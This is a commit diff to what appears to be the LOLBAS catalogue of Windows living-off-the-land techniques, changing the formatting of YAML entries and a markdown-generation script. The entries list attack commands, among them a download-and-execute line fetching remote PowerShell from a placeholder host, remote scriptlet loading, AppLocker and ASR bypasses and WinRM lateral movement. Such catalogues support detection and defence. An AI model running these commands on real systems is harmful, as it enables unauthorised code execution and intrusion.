Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files

Mgmt-Scripts/MDFromYaml-webportal.ps1

@@ -52,7 +52,7 @@ function Convert-YamlToMD
             if($grp.Category -eq "Upload"){$Uplo += $grp}
             if($grp.Category -eq "Encode"){$Enco += $grp}
             if($grp.Category -eq "Decode"){$Deco += $grp}
-            if($grp.Category -eq "Alternate data streams"){$ADS += $grp}
+            if($grp.Category -eq "ADS"){$ADS += $grp}
             if($grp.Category -eq "Copy"){$Copy += $grp}
             if($grp.Category -eq "Credentials"){$Cred += $grp}
             if($grp.Category -eq "Compile"){$Comp += $grp}
@@ -333,6 +333,8 @@ function Invoke-GenerateMD
 }
 
 #Generate the stuff!
+# Remember to delete existing files first or else it will only append...
+
 #Bins
 Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
 Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose

yml/OSBinaries/Cmdkey.yml

@@ -18,7 +18,7 @@ Full Path:
 Code Sample: 
 - Code:
 Detection:
- - IOC: Usage of this command could be and IOC
+ - IOC: Usage of this command could be an IOC
 Resources:
   - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
   - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey

yml/OSLibraries/Advpack.yml

@@ -1,7 +1,7 @@
 ---
 Name: Advpack.dll
 Description: Utility for installing software and drivers with rundll32.exe
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

yml/OSLibraries/Ieadvpack.yml

@@ -1,7 +1,7 @@
 ---
 Name: Ieadvpack.dll
 Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
@@ -49,7 +49,7 @@ Code Sample:
   - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
   - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
 Detection:
-  - IOC: ''
+  - IOC:
 Resources:
   - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
   - Link: https://twitter.com/pabraeken/status/991695411902599168

yml/OSLibraries/Ieframe.yml

@@ -1,13 +1,13 @@
 ---
 Name: Ieaframe.dll
 Description: Internet Browser DLL for translating HTML code.
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
     Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
     UseCase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -18,7 +18,7 @@ Full Path:
 Code Sample:
   - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
 Detection:
-  - IOC: ''
+  - IOC:
 Resources:
   - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
   - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/

yml/OSLibraries/Mshtml.yml

@@ -1,13 +1,13 @@
 ---
 Name: Mshtml.dll
 Description: Microsoft HTML Viewer
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
     Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).
     UseCase: Launch an HTA application.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -16,9 +16,9 @@ Full Path:
   - Path: c:\windows\system32\mshtml.dll
   - Path: c:\windows\syswow64\mshtml.dll
 Code Sample:
-  - Code: ''
+  - Code:
 Detection:
-  - IOC: ''
+  - IOC:
 Resources:
   - Link: https://twitter.com/pabraeken/status/998567549670477824
   - Link: https://windows10dll.nirsoft.net/mshtml_dll.html

yml/OSLibraries/Pcwutl.yml

@@ -1,13 +1,13 @@
 ---
 Name: Pcwutl.dll
 Description: Microsoft HTML Viewer
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
     Description: Launch executable by calling the LaunchApplication function.
     UseCase: Launch an executable.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -16,7 +16,7 @@ Full Path:
   - Path: c:\windows\system32\pcwutl.dll
   - Path: c:\windows\syswow64\pcwutl.dll
 Code Sample:
-  - Code: ''
+  - Code:
 Detection:
   - IOC:
 Resources:

yml/OSLibraries/Setupapi.yml

@@ -1,7 +1,7 @@
 ---
 Name: Setupapi.dll
 Description: Windows Setup Application Programming Interface
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf

yml/OSLibraries/Shdocvw.yml

@@ -1,13 +1,13 @@
 ---
 Name: Shdocvw.dll
 Description: Shell Doc Object and Control Library.
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
     Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
     UseCase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -18,7 +18,7 @@ Full Path:
 Code Sample:
   - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
 Detection:
-  - IOC: ''
+  - IOC:
 Resources:
     - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
     - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/

yml/OSLibraries/Shell32.yml

@@ -1,13 +1,13 @@
 ---
 Name: Shell32.dll
 Description: Windows Shell Common Dll
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll
     Description: Launch a DLL payload by calling the Control_RunDLL function.
     UseCase: Load a DLL payload.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -15,14 +15,14 @@ Commands:
   - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
     Description: Launch an executable by calling the ShellExec_RunDLL function.
     UseCase: Run an executable payload.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
   - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
     Description: Launch command line by calling the ShellExec_RunDLL function.
     UseCase: Run an executable payload.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -30,9 +30,9 @@ Full Path:
   - Path: c:\windows\system32\shell32.dll
   - Path: c:\windows\syswow64\shell32.dll
 Code Sample:
-  - Code: ''
+  - Code:
 Detection:
-  - IOC: ''
+  - IOC:
 Resources:
   - Link: https://twitter.com/Hexacorn/status/885258886428725250
   - Link: https://twitter.com/pabraeken/status/991768766898941953

yml/OSLibraries/Syssetup.yml

@@ -1,7 +1,7 @@
 ---
 Name: Syssetup.dll
 Description: Windows NT System Setup
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf

yml/OSLibraries/Url.yml

@@ -1,13 +1,13 @@
 ---
 Name: Url.dll
 Description: Internet Shortcut Shell Extension DLL.
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
     Description: Launch a HTML application payload by calling OpenURL.
     UseCase: Invoke an HTML Application via mshta.exe (Default Handler).
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -15,7 +15,7 @@ Commands:
   - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
     Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
     UseCase: Load an executable payload by calling a .url file with or without quotes.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -23,7 +23,7 @@ Commands:
   - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
     Description: Launch an executable by calling OpenURL.
     UseCase: Load an executable payload by specifying the file protocol handler (obfuscated).
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -31,7 +31,7 @@ Commands:
   - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
     Description: Launch an executable by calling FileProtocolHandler.
     UseCase: Launch an executable.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -39,7 +39,7 @@ Commands:
   - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
     Description: Launch an executable by calling FileProtocolHandler.
     UseCase: Load an executable payload by specifying the file protocol handler (obfuscated).
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -47,7 +47,7 @@ Commands:
   - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
     Description: Launch a HTML application payload by calling FileProtocolHandler.
     UseCase: Invoke an HTML Application via mshta.exe (Default Handler).
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -56,9 +56,9 @@ Full Path:
   - Path: c:\windows\system32\url.dll
   - Path: c:\windows\syswow64\url.dll
 Code Sample:
-  - Code: ''
+  - Code:
 Detection:
-  - IOC: ''
+  - IOC:
 Resources:
   - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
   - Link: https://twitter.com/DissectMalware/status/995348436353470465

yml/OSLibraries/Zipfldr.yml

@@ -1,13 +1,13 @@
 ---
 Name: Zipfldr.dll
 Description: Compressed Folder library
-Author: ''
+Author:
 Created: '2018-05-25'
 Commands:
   - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
     Description: Launch an executable payload by calling RouteTheCall.
     UseCase: Launch an executable.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -15,7 +15,7 @@ Commands:
   - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
     Description: Launch an executable payload by calling RouteTheCall (obfuscated).
     UseCase: Launch an executable.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1085
     MItreLink: https://attack.mitre.org/wiki/Technique/T1085
@@ -24,9 +24,9 @@ Full Path:
   - Path: c:\windows\system32\zipfldr.dll
   - Path: c:\windows\syswow64\zipfldr.dll
 Code Sample:
-  - Code: ''
+  - Code:
 Detection:
-  - IOC: ''
+  - IOC:
 Resources:
   - Link: https://twitter.com/moriarty_meng/status/977848311603380224
   - Link: https://twitter.com/bohops/status/997896811904929792

yml/OSScripts/CL_mutexverifiers.yml

@@ -1,18 +1,28 @@
 ---
 Name: CL_Mutexverifiers.ps1
-Description: Execute
+Description:
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
-  - Command: ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1"
+  - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1
     Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
-  - C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
+  - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
-  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
-Code Sample: []
+Code Sample: 
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/pabraeken/status/995111125447577600
+  - Link: https://twitter.com/pabraeken/status/995111125447577600
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
+---

yml/OSScripts/Cl_invocation.yml

@@ -1,20 +1,30 @@
 ---
 Name: CL_Invocation.ps1
-Description: Execute
+Description: Aero diagnostics script
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
     Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
+  - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
-  - C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
+  - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
-  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
+  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
-Code Sample: []
+Code Sample: 
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
+  - Link: 
-  - https://twitter.com/bohops/status/948548812561436672
+Acknowledgement:
-  - https://twitter.com/pabraeken/status/995107879345704961
+  - Person: Jimmy
-Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)
+    Handle: '@bohops'
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
+---

yml/OSScripts/Manage-bde.yml

@@ -1,19 +1,37 @@
 ---
 Name: Manage-bde.wsf
-Description: Execute
+Description: Script for managing BitLocker
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
     Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
+    Usecase: Proxy execution from script
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
     Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
+    Usecase: Proxy execution from script
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - C:\Windows\System32\manage-bde.wsf
+  - Path: C:\Windows\System32\manage-bde.wsf
-Code Sample: []
+Code Sample: 
-Detection: []
+  - Code:
+Detection:
+  - IOC: Manage-bde.wsf should normally not be invoked by a user
 Resources:
-  - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
+  - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
-  - https://twitter.com/bohops/status/980659399495741441
+  - Link: https://twitter.com/bohops/status/980659399495741441
-Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'
+  - Person: Daniel Bohannon
+    Handle: '@danielbohannon'
+---

yml/OSScripts/Pubprn.yml

@@ -1,20 +1,29 @@
 ---
 Name: Pubprn.vbs
-Description: Execute
+Description:
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
-    Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
+    Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
+  - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
-  - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
+  - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
 Code Sample: 
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct
-Detection: []
+Detection:
+  - IOC:
 Resources:
-  - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+  - Link: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
-  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-  - https://github.com/enigma0x3/windows-operating-system-archaeology
+  - Link: https://github.com/enigma0x3/windows-operating-system-archaeology
-Notes: Thanks to Matt Nelson - @enigma0x3
+Acknowledgement:
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'
+---

yml/OSScripts/Slmgr.yml

@@ -1,20 +1,31 @@
 ---
 Name: Slmgr.vbs
-Description: Execute
+Description: Script used to manage windows license activation
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
-    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - c:\windows\system32\slmgr.vbs
+  - Path: C:\Windows\System32\slmgr.vbs
-  - c:\windows\sysWOW64\slmgr.vbs
+  - Path: C:\Windows\SysWOW64\slmgr.vbs
 Code Sample: 
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
-Detection: []
+Detection:
+  - IOC:
 Resources:
-  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-  - https://www.youtube.com/watch?v=3gz1QmiMhss
+  - Link: https://www.youtube.com/watch?v=3gz1QmiMhss
-Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee
+Acknowledgement:
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'
+  - Person: Casey Smith
+    Handle: '@subtee'
+---

yml/OSScripts/Syncappvpublishingserver.yml

@@ -1,17 +1,29 @@
 ---
-Name: SyncAppvPublishingServer.vbs
+Name: Syncappvpublishingserver.vbs
-Description: Execute
+Description: Script used related to app-v and publishing server
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
     Description: Inject PowerShell script code with the provided arguments
+    Usecase: Use Powershell host invoked from vbs script
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\System32\SyncAppvPublishingServer.vbs
+  - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
-Code Sample: []
+Code Sample: 
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/monoxgas/status/895045566090010624
+  - Link: https://twitter.com/monoxgas/status/895045566090010624
-  - https://twitter.com/subTee/status/855738126882316288
+  - Link: https://twitter.com/subTee/status/855738126882316288
-Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee
+Acknowledgement:
+  - Person: Nick Landers
+    Handle: '@monoxgas'
+  - Person: Casey Smith
+    Handle: '@subtee'
+---

yml/OSScripts/Winrm.yml

@@ -1,28 +1,54 @@
 ---
-Name: Winrm.vbs
+Name: winrm.vbs
-Description: Execute
+Description: Script used for manage Windows RM settings
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
     Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
-  - Command: winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
+    Usecase: Proxy execution
-    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.
+    Category: Execute
-  - Command: winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
+    Privileges: User
-    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
+  - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
+  - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\windows\system32\winrm.vbs
+  - Path: C:\Windows\System32\winrm.vbs
-  - C:\windows\SysWOW64\winrm.vbs
+  - Path: C:\Windows\SysWOW64\winrm.vbs
 Code Sample: 
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
-Detection: []
+Detection:
+  - IOC:
 Resources:
-  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-  - https://www.youtube.com/watch?v=3gz1QmiMhss
+  - Link: https://www.youtube.com/watch?v=3gz1QmiMhss
-  - https://github.com/enigma0x3/windows-operating-system-archaeology
+  - Link: https://github.com/enigma0x3/windows-operating-system-archaeology
-  - https://redcanary.com/blog/lateral-movement-winrm-wmi/
+  - Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
-  - https://twitter.com/bohops/status/994405551751815170
+  - Link: https://twitter.com/bohops/status/994405551751815170
-Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)
+Acknowledgement:
-
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'
+  - Person: Casey Smith
+    Handle: '@subtee'
+  - Person: Jimmy
+    Handle: '@bohops'
+  - Person: Red Canary Company cc Tony Lambert
+    Handle: '@redcanaryco'
+---

yml/OSScripts/pester.yml

@@ -1,18 +1,27 @@
 ---
-Name: pester.bat
+Name: Pester.bat
-Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
+Description: Used as part of the Powershell pester
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command:  Pester.bat [/help|?|-?|/?] "$null; notepad"
-    Description: Execute notepad
+    Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
+  - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
-  - c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
+  - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
-Code Sample: []
+Code Sample: 
-Detection: []
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/Oddvarmoe/status/993383596244258816
+  - Link: https://twitter.com/Oddvarmoe/status/993383596244258816
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
+Acknowledgement:
-Notes: Thanks to Emin Atac - @p0w3rsh3ll
+  - Person: Emin Atac
+    Handle: '@p0w3rsh3ll'
+---

yml/OtherMSBinaries/Appvlp.yml

@@ -7,7 +7,7 @@ Commands:
   - Command: AppVLP.exe \\webdav\calc.bat
     Usecase: Execution of BAT file hosted on Webdav server.
     Description: Executes calc.bat through AppVLP.exe
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -15,7 +15,7 @@ Commands:
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
     Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
@@ -23,21 +23,23 @@ Commands:
   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
     Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
-    Category: Execution
+    Category: Execute
     Privileges: User
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 w/Office 2016
 Full Path:
-  - C:\Program Files\Microsoft Office\root\client\appvlp.exe
+  - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
-  - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
